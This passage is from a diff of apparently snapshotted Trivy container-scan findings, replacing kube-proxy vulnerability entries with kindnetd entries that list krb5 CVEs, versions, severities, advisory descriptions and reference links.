"scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4990-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-12290", - "installedVersion": "2.0.5-1+deb10u1", - "packageName": "libidn2-0", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", - "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", - "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", - "https://gitlab.com/libidn/libidn2/merge_requests/71", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", - "https://security.gentoo.org/glsa/202003-63", - "https://ubuntu.com/security/notices/USN-4168-1", - "https://usn.ubuntu.com/4168-1/", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490 Section 4.2 when converting A-labels to U-labels. This makes it possible in some circumstances for one domain to impersonate another. By creating a malicious domain that matches a target domain except for the inclusion of certain punycoded Unicode characters (that would be discarded when converted first to a Unicode label and then back to an ASCII label), arbitrary domains can be impersonated.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ...", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-12290", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/merge_requests/71", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202003-63", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4168-1", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4168-1/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5800-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5828-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5936-1", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/advisories/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], "severity": "HIGH", @@ -160235,437 +160727,459 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip4tc2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip4tc2", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip6tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip6tc2", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://ubuntu.com/security/notices/USN-5800-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5828-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5936-1", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/advisories/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.8.3-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3520", - "installedVersion": "1.8.3-1", - "packageName": "liblz4-1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3520", - "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", - "https://errata.almalinux.org/8/ALSA-2021-2575.html", - "https://errata.rockylinux.org/RLSA-2021:2575", - "https://github.com/lz4/lz4/pull/972", - "https://linux.oracle.com/cve/CVE-2021-3520.html", - "https://linux.oracle.com/errata/ELSA-2021-2575.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", - "https://security.netapp.com/advisory/ntap-20211104-0005/", - "https://ubuntu.com/security/notices/USN-4968-1", - "https://ubuntu.com/security/notices/USN-4968-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3520", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "memory corruption due to an integer overflow bug caused by memmove argument", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3520", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3520", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-2575.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:2575", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/972", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3520.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2575.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0005/", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4968-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4968-2", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3520", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 